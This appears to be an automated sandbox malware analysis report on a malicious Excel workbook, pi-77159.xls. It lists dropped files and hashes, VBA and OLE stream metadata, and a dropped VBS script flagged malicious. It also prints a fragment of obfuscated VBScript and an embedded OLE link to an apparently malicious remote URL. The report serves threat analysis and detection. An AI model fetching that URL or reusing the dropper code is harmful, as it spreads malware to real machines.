                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                                                                                                            MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                                                                                                            SHA1:FA589EA7BA858C514079289BCEA3625432110427
                                                                                                            SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                                                                                                            SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                                                                                                            Malicious:false
                                                                                                            Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):142466
                                                                                                            Entropy (8bit):3.674082413060924
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
                                                                                                            MD5:DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
                                                                                                            SHA1:7588E7A25BF351AC5A16ECA9B68686C7970E60E5
                                                                                                            SHA-256:99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
                                                                                                            SHA-512:D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
                                                                                                            Malicious:true
                                                                                                            Preview:..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. .B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o..... . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .e.s.f.a.l.f.a.m.e.n.t.o. .>. .0..... . . . . . . . .a.m.b.a.r.i.n.o. .=. .L.e.f.t.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .-. .1.). .&. .c.o.n.t.r.a.m.a.r.t.e.l.o.s. .&. .M.i.d.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.p.n.e.o.m.e.t.r.i.a.).)..... . . . . . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.c.o.n.t.r.a.m.a.r.t.e.l.o.s.).,. .a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . .L.o.o.p..... . . . ..... . . . .r.e.s.t.i.v.o. .=. .a.m.b.a.r.i.n.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

                                                                                                            C:\Users\user\Desktop\38630000

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):935936
                                                                                                            Entropy (8bit):7.986311019174553
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:1HuBuqIVyhRwSNjBK9g+DfS6FO88u5viBGmRYkg:ouHohR/NjBKi+LSoOLMyrRYR
                                                                                                            MD5:10419D9E0542858E14BD1DC78C2BE28F
                                                                                                            SHA1:9197BE297011961C10A233E1A570D1B537F4B1D7
                                                                                                            SHA-256:AD1147B4C2B7492602B57B77B19860ABFCC882F17CE1C7548811CDC12F69A358
                                                                                                            SHA-512:524405CE8530D5984169BFAE25A62D4A27B8239616CBA135179CA2A139F7AD6E04B9CBD8C992B5B98E8127220729BE3371242D0E70E7EA04ADC9E2F66B6759A9
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...................................$...........................................................g.......i.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                            C:\Users\user\Desktop\38630000:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            C:\Users\user\Desktop\pi-77159.xls (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):935936
                                                                                                            Entropy (8bit):7.986311019174553
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:1HuBuqIVyhRwSNjBK9g+DfS6FO88u5viBGmRYkg:ouHohR/NjBKi+LSoOLMyrRYR
                                                                                                            MD5:10419D9E0542858E14BD1DC78C2BE28F
                                                                                                            SHA1:9197BE297011961C10A233E1A570D1B537F4B1D7
                                                                                                            SHA-256:AD1147B4C2B7492602B57B77B19860ABFCC882F17CE1C7548811CDC12F69A358
                                                                                                            SHA-512:524405CE8530D5984169BFAE25A62D4A27B8239616CBA135179CA2A139F7AD6E04B9CBD8C992B5B98E8127220729BE3371242D0E70E7EA04ADC9E2F66B6759A9
                                                                                                            Malicious:true
                                                                                                            Preview:......................>...................................$...........................................................g.......i.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 07:51:58 2024, Security: 1
                                                                                                            Entropy (8bit):7.980524078913288
                                                                                                            TrID:
                                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                            File name:pi-77159.xls
                                                                                                            File size:1'136'640 bytes
                                                                                                            MD5:65fbcc8da027e55f200e662f94037339
                                                                                                            SHA1:a45ff70dd8f364f4d3f0d4be15430fd288bdbbf7
                                                                                                            SHA256:cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d
                                                                                                            SHA512:bcf76e0ad9dc6a4056b5815fb1dd424dd7f0c175debc15fc878a3fc9f2a8c29df5bc00156ab378cac77ec4a9c7b8e8e2d688d97236b0966d1ffba013359b68d6
                                                                                                            SSDEEP:24576:5uq9PLiijE2Z5Z2amLKuhoF84LJQohXvFClUd7nZDiTtOZc:5uEPLiij7Z5ZKLGFjLJQohXvFTNnb6
                                                                                                            TLSH:BD352351FDC9DE87E29AA9320CD7C9B215147C82BE9C66452B62B35F34B86F10F831D8
                                                                                                            File Content Preview:........................>.......................................................................................................j.......l.......n..............................................................................................................

                                                                                                            File Icon

                                                                                                            Icon Hash:276ea3a6a6b7bfbf

                                                                                                            Static OLE Info

                                                                                                            General

                                                                                                            Document Type:OLE
                                                                                                            Number of OLE Files:1

                                                                                                            OLE File "pi-77159.xls"

                                                                                                            Indicators
                                                                                                            Has Summary Info:
                                                                                                            Application Name:Microsoft Excel
                                                                                                            Encrypted Document:True
                                                                                                            Contains Word Document Stream:False
                                                                                                            Contains Workbook/Book Stream:True
                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                            Contains Visio Document Stream:False
                                                                                                            Contains ObjectPool Stream:False
                                                                                                            Flash Objects Count:0
                                                                                                            Contains VBA Macros:True
                                                                                                            Summary
                                                                                                            Code Page:1252
                                                                                                            Author:
                                                                                                            Last Saved By:
                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                            Last Saved Time:2024-11-20 07:51:58
                                                                                                            Creating Application:Microsoft Excel
                                                                                                            Security:1
                                                                                                            Document Summary
                                                                                                            Document Code Page:1252
                                                                                                            Thumbnail Scaling Desired:False
                                                                                                            Contains Dirty Links:False
                                                                                                            Shared Document:False
                                                                                                            Changed Hyperlinks:False
                                                                                                            Application Version:786432

                                                                                                            Streams with VBA

                                                                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                            VBA File Name:Sheet1.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea 9b e2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            VBA Code
                                                                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                            VBA File Name:Sheet2.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea c8 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            VBA Code
                                                                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                            VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                            VBA File Name:Sheet3.cls
                                                                                                            Stream Size:977
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea 85 4f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            VBA Code
                                                                                                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                            Stream Size:985
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 .
                                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 ea dd f6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            VBA Code
                                                                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                            Streams

                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                            General
                                                                                                            Stream Path:\x1CompObj
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:114
                                                                                                            Entropy:4.25248375192737
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                            General
                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:244
                                                                                                            Entropy:2.889430592781307
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                            General
                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:200
                                                                                                            Entropy:3.250350317504982
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 8 . ! ; . . . . . . . . .
                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                            Stream Path: MBD0032224F/\x1CompObj, File Type: data, Stream Size: 99
                                                                                                            General
                                                                                                            Stream Path:MBD0032224F/\x1CompObj
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:99
                                                                                                            Entropy:3.631242196770981
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Stream Path: MBD0032224F/Package, File Type: Microsoft Excel 2007+, Stream Size: 781880
                                                                                                            General
                                                                                                            Stream Path:MBD0032224F/Package
                                                                                                            CLSID:
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Stream Size:781880
                                                                                                            Entropy:7.996273102481432
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:P K . . . . . . . . . . ! . j A 3 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 6a 41 33 c9 e9 01 00 00 fc 08 00 00 13 00 e1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Stream Path: MBD00322250/\x1Ole, File Type: data, Stream Size: 570
                                                                                                            General
                                                                                                            Stream Path:MBD00322250/\x1Ole
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:570
                                                                                                            Entropy:5.703654441110761
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . b n N . . . . . . . . . . . . l . . . y . . . K . h . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . V . H . b . T . I . 8 . ? . & . t . h . o . r . n . = . g . a . m . y . & . m . a . n . d . o . l . i . n . = . p . e . r . f . e . c . t . & . s . h . o . o . t . = . h . u . m . d . r . u . m . & . c . h . a . n . d . e . l . i . e . r . = . j . a . g . g . e . d . & . l . a . c . e . . . d H G H t 9 # n B Y . = B 0 . . . 2 > . U E . ; , . 1 . d . 7 . . . K c . * N E
                                                                                                            Data Raw:01 00 00 02 0d 95 62 6e f9 e3 ad 4e 00 00 00 00 00 00 00 00 00 00 00 00 6c 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 68 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 56 00 48 00 62 00 54 00 49 00 38 00 3f 00 26 00 74 00 68 00 6f 00 72 00 6e 00 3d 00 67 00 61 00 6d 00 79 00 26 00 6d 00 61 00 6e 00
                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 330959
                                                                                                            General
                                                                                                            Stream Path:Workbook
                                                                                                            CLSID:
                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                            Stream Size:330959
                                                                                                            Entropy:7.998806695646549
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . N ' M 9 Q & 7 . . . T u } 9 . . > ~ m . = K . . . . . . . . . . . . . . \\ . p . > @ = . \\ ` j c , K B . # x . u h ! j . A X q $ 6 . Y r w R : . C g + . ] . . E S k . } ) . F . . x . - } Z N p B . . . , a . . . j v . . . = . . . $ j 7 . . . . 0 P $ ' . Q J . . . . . . . - . . . . . . . . . . . . ~ . . . a = . . . . i e 4 J + e $ > @ . . . . . . " . . . w . . . . 9 . . . . . . 1 . . . Q R . . M ; . . / c S 6 1 . . . ( I . . . m . j . \\ . k . 1 .
                                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 fe d3 82 4e 27 4d 39 bb d2 51 f6 26 92 a1 eb 37 c9 8c e1 cd a0 09 54 75 c7 7d 39 d5 b5 1d 3e 81 93 7e cd c8 ce ec ea 90 6d 0c 3d 4b 01 7f 03 bc e1 00 02 00 b0 04 c1 00 02 00 03 a5 e2 00 00 00 5c 00 70 00 e3 fb 97 20 bd 3e 40 8d 3d df f8 d6 ea c6 d5 9f 5c a3 60 9b ec d7 6a 63 ca 2c 4b af 42 04
                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                            CLSID:
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Stream Size:527
                                                                                                            Entropy:5.256464730520852
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:I D = " { 7 5 B A 8 B E 8 - 8 0 4 5 - 4 6 8 F - A E 8 0 - D 0 9 6 2 E 9 7 5 E 6 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 0 F 6 E 4 F 6 E 4 F 6 E
                                                                                                            Data Raw:49 44 3d 22 7b 37 35 42 41 38 42 45 38 2d 38 30 34 35 2d 34 36 38 46 2d 41 45 38 30 2d 44 30 39 36 32 45 39 37 35 45 36 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:104
                                                                                                            Entropy:3.0488640812019017
                                                                                                            Base64 Encoded:False
